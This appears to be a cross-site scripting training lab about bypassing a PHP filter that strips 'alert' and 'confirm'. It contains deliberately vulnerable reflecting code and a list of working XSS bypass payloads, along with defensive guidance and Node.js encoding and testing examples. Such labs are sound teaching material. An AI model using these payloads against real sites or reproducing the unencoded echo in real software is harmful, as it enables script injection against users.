Function Filtering XSS Lab

Test XSS with JavaScript function name filtering

Function Filtering Challenge

Lab Overview

This lab demonstrates function name filtering, where specific JavaScript function names are blocked while allowing other code execution.

Function Filtering: The application blocks specific JavaScript function names ('alert' and 'confirm') but allows other code execution.
Hidden Parameter: There's a hidden parameter not shown in the main form. Use tools like Arjun to discover it!
Function Filter: Blocks two specific JavaScript function names by deleting the literal substrings
Blocked functions:
alert
confirm
Filter method: str_replace(array('alert','confirm'), '', $_GET['categoryid'])
Filter Demonstration:
Input: <script>alert(1)</script>
After filter: <script>(1)</script>
The 'alert' and 'confirm' substrings are removed in a single, case-sensitive pass and the result is echoed without encoding. What is left, (1), is still valid JavaScript (a harmless expression), so the naive payload no longer shows a dialog; but the filter matches only those two exact substrings, leaves every other function and all HTML intact, and does not re-scan its own output, so it can be bypassed.
Filter Complexity: Function Name Filtering

Objective: Bypass the function name filter and execute JavaScript code using alternative functions or obfuscation techniques.

Backend Source Code
<?php
// Visible parameters: encoded with htmlspecialchars() and ENT_QUOTES, so they are
// not injectable in this HTML body context.
if(isset($_GET["fname"]) && isset($_GET["lname"])){
    echo htmlspecialchars($_GET["fname"], ENT_QUOTES);
    echo htmlspecialchars($_GET["lname"], ENT_QUOTES);
}
// Hidden parameter: a case-sensitive blacklist of two function names, then raw output.
// str_replace() makes one non-overlapping pass per search string and does not re-scan
// the result, so 'alalertert' comes out as 'alert'.
elseif(isset($_GET["categoryid"])){
    $arr = array('alert','confirm');
    $re = str_replace($arr, '', $_GET['categoryid']);
    echo $re;   // reflected unencoded: any surviving markup or script is rendered
}
# use arjun tool to find hidden parameter
Test Input Forms
Visible Parameters (HTML Encoded)
fname and lname are both output through htmlspecialchars() with ENT_QUOTES, so <, >, &, " and ' are encoded and they are not injectable in the HTML body.
Hidden Parameter
Hint: The 'categoryid' parameter is not shown in the main form but is implemented in the backend with function filtering.
This parameter strips the literal strings 'alert' and 'confirm' and reflects everything else unencoded.
Bypass Techniques for Function Filtering
Alternative Functions (the filter only knows two names):
  • prompt(1) - Use prompt instead of alert
  • console.log(1) - Output to console
  • document.write(1) - Write to document
  • print() - Print dialog (if supported)
Function Obfuscation (the name 'alert' never appears as a contiguous substring in the request):
  • window['al'+'ert'](1) - String concatenation, then property lookup on window
  • eval('al'+'ert(1)') - Using eval
  • Function('al'+'ert(1)')() - Function constructor
  • setTimeout('al'+'ert(1)') - Using setTimeout with a string argument (note that setTimeout('alert(1)') would be stripped to setTimeout('(1)'))
Filter Weakness (str_replace is single-pass):
  • alalertert(1) - The inner 'alert' is removed, and the surrounding characters join to form 'alert' again; the filter never re-scans its output
Advanced Bypass Techniques:
  • Use HTML entities in an attribute context, where the HTML parser decodes them before the JavaScript parser runs: <img src=x onerror="&#97;lert(1)"> (entities are not decoded inside <script> content, so they do not help there)
  • Use Unicode escapes in the identifier: <script>al\u0065rt(1)</script>
  • Use character codes to build the name: <script>window[String.fromCharCode(97,108,101,114,116)](1)</script> (the string itself is not callable; it must be used as a property name)
  • Use alternative object references: <script>top['al'+'ert'](1)</script> (top.alert(1) would be stripped to top.(1), a syntax error)
Security Implications

Function name filtering demonstrates:

  • Blocking specific function names is an ineffective security control
  • JavaScript provides many ways to reach the same function without ever writing its name
  • Function name filtering can be bypassed with trivial obfuscation, and a single-pass filter can even be made to reassemble the blocked name
  • This approach provides a false sense of security
  • Context-aware output encoding is the primary, reliable defense against reflected XSS
  • Content Security Policy (CSP) adds a second layer that limits what an injected payload can do if encoding is ever missed
Best Practices

For secure web applications:

  • Use context-aware output encoding, not function filtering
  • Implement strict Content Security Policy (CSP) headers
  • Validate input using strict allowlists, not blacklists
  • Use modern sanitization libraries (DOMPurify, etc.) when HTML must be accepted
  • Implement Trusted Types for DOM XSS protection
  • Use security headers such as X-Content-Type-Options: nosniff (X-XSS-Protection is deprecated, has been removed from modern browsers, and should not be relied on)
  • Conduct regular security testing and code reviews
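The "context-aware output encoding" bullet is the one practitioners most often get half right, so here is an added worked example (not part of the lab's own code) in Node.js. It shows the encoding the vulnerable echo $re should have used for the HTML body, and why the same encoding is not sufficient when the value lands inside an inline event handler: the browser decodes HTML entities in an attribute before the JavaScript parser sees it. The function names (renderCategory, selectCategory, encodeForJsString) and the payload are assumptions made for the example.

```javascript
// Added example: context-aware output encoding for a reflected "categoryid" value.
// Not the lab's code; function names and the sample payload are assumptions.

// HTML body / attribute-value context: equivalent of PHP htmlspecialchars($s, ENT_QUOTES).
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function encodeForHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// JavaScript string-literal context: escape every non-alphanumeric character as \xHH or \uHHHH,
// so the value can never close the literal, the script block, or the surrounding attribute.
function encodeForJsString(value) {
  return String(value).replace(/[^A-Za-z0-9]/g, (c) => {
    const code = c.charCodeAt(0);
    return code < 0x100
      ? '\\x' + code.toString(16).padStart(2, '0')
      : '\\u' + code.toString(16).padStart(4, '0');
  });
}

// Correct handling for the lab's case: the value is reflected into the HTML body.
function renderCategory(value) {
  return `<p>Category: ${encodeForHtml(value)}</p>`;
}

// Wrong: HTML encoding alone inside an inline handler. The HTML parser turns &#39; back into '
// before the JavaScript parser runs, so the quote still terminates the string literal.
function renderOnclickWrong(value) {
  return `<a href="#" onclick="selectCategory('${encodeForHtml(value)}')">Select</a>`;
}

// Right: encode for the innermost context first (JS string), then for the outer one (HTML attribute).
function renderOnclickRight(value) {
  return `<a href="#" onclick="selectCategory('${encodeForHtml(encodeForJsString(value))}')">Select</a>`;
}

// Minimal entity decoder: reproduces what the JavaScript engine sees once the HTML parser has
// processed the attribute value. One pass, so &amp;lt; correctly becomes &lt; and not <.
function decodeHtmlEntities(s) {
  const map = { amp: '&', lt: '<', gt: '>', quot: '"', '#39': "'" };
  return s.replace(/&(amp|lt|gt|quot|#39);/g, (_, e) => map[e]);
}
function onclickSourceSeenByEngine(html) {
  const m = /onclick="([^"]*)"/.exec(html);
  return m ? decodeHtmlEntities(m[1]) : '';
}

// Constructed payload: tries to close selectCategory('...') and append a call.
const PAYLOAD = "'); prompt(1); //";
console.log(renderCategory('<script>prompt(1)</script>'));
console.log('wrong  ->', onclickSourceSeenByEngine(renderOnclickWrong(PAYLOAD)));
console.log('right  ->', onclickSourceSeenByEngine(renderOnclickRight(PAYLOAD)));
```

The take-away is the ordering rule: encode for the innermost context first and the outermost last, and never reuse an HTML encoder for a JavaScript or URL context just because it "looks escaped" in the page source.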
Payload Examples for Function Filter Bypass
Alternative Functions:
  • <script>prompt(1)</script>
  • <script>console.log(1)</script>
  • <script>document.write(1)</script>
  • <script>document.title=1</script>
Function Obfuscation:
  • <script>window['al'+'ert'](1)</script>
  • <script>eval('al'+'ert(1)')</script>
  • <script>Function('al'+'ert(1)')()</script>
  • <script>setTimeout('al'+'ert(1)')</script> - The string argument must not contain 'alert' literally, or the filter strips it
  • <script>alalertert(1)</script> - Single-pass str_replace removes the inner 'alert' and leaves 'alert(1)'
Advanced Techniques:
  • <img src=x onerror="&#97;lert(1)"> - HTML entities, decoded by the attribute parser before the JavaScript runs (not usable inside <script> content)
  • <script>al\u0065rt(1)</script> - Unicode escape in the identifier
  • <script>[].filter.constructor('al'+'ert(1)')()</script> - Function constructor reached through an array method
  • <script>location='javascript:al'+'ert(1)'</script> - Location redirect to a javascript: URL, with the name split so the filter does not match it
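To check which of the payloads listed under Bypass Techniques and Payload Examples actually survive this exact filter, here is an added harness (not part of the lab) that reimplements the PHP str_replace(array('alert','confirm'), '', ...) semantics in Node.js and then runs each filtered payload with a stubbed alert(). It assumes the payloads are the JavaScript that would sit inside <script>...</script>; browser-only APIs (document, location, string-argument setTimeout) are out of scope for the harness, and the payload list is constructed for the example.

```javascript
// Added example: simulate the lab's categoryid filter and test which bypasses still reach alert().
// Not the lab's code. Payload list is constructed; browser-only APIs are not emulated.

// PHP str_replace() with an array of search strings removes each needle in one non-overlapping,
// left-to-right pass, in array order, and never re-scans the result. split/join has the same
// semantics in JavaScript. Consequence: "alalertert" -> inner "alert" removed -> "alert".
function phpStrReplace(needles, replacement, subject) {
  return needles.reduce((s, n) => s.split(n).join(replacement), subject);
}
function filterCategoryId(input) {
  return phpStrReplace(['alert', 'confirm'], '', input);
}

// Stand-ins for the browser globals the payloads reference; alert() just records its argument.
globalThis.window = globalThis;
globalThis.top = globalThis;
const alertCalls = [];
globalThis.alert = (v) => { alertCalls.push(v); };

// Run the filtered JavaScript and report whether alert() fired. A syntax error produced by the
// filter (e.g. "top.(1)") is caught and counts as "did not fire".
function alertFires(js) {
  alertCalls.length = 0;
  try { new Function(js)(); } catch (e) { return false; }
  return alertCalls.length > 0;
}

// Constructed payloads: two that the filter defeats, then the page's bypasses and the
// single-pass weakness of str_replace itself.
const PAYLOADS = [
  'alert(1)',                                            // stripped to "(1)": harmless expression
  'top.alert(1)',                                        // stripped to "top.(1)": syntax error
  'alalertert(1)',                                       // inner "alert" removed, outer one reassembled
  "window['al'+'ert'](1)",
  "eval('al'+'ert(1)')",
  "Function('al'+'ert(1)')()",
  'al\\u0065rt(1)',                                      // identifier spelled with a Unicode escape
  'window[String.fromCharCode(97,108,101,114,116)](1)',
  "[].filter.constructor('al'+'ert(1)')()",
];

// Returns one record per payload: what the server would echo, and whether alert() ran.
function evaluatePayloads(payloads = PAYLOADS) {
  return payloads.map((payload) => {
    const filtered = filterCategoryId(payload);
    return { payload, filtered, fires: alertFires(filtered) };
  });
}

for (const r of evaluatePayloads()) {
  console.log(`${r.fires ? 'FIRES  ' : 'blocked'}  ${r.payload.padEnd(52)} -> ${r.filtered}`);
}
```

Two things the table makes visible that the bullet lists do not: any payload that spells out the literal name in a string (setTimeout('alert(1)'), top.alert(1)) is broken by the filter, so it must be split or escaped; and because the filter is single-pass, the blocked name can simply be nested inside itself.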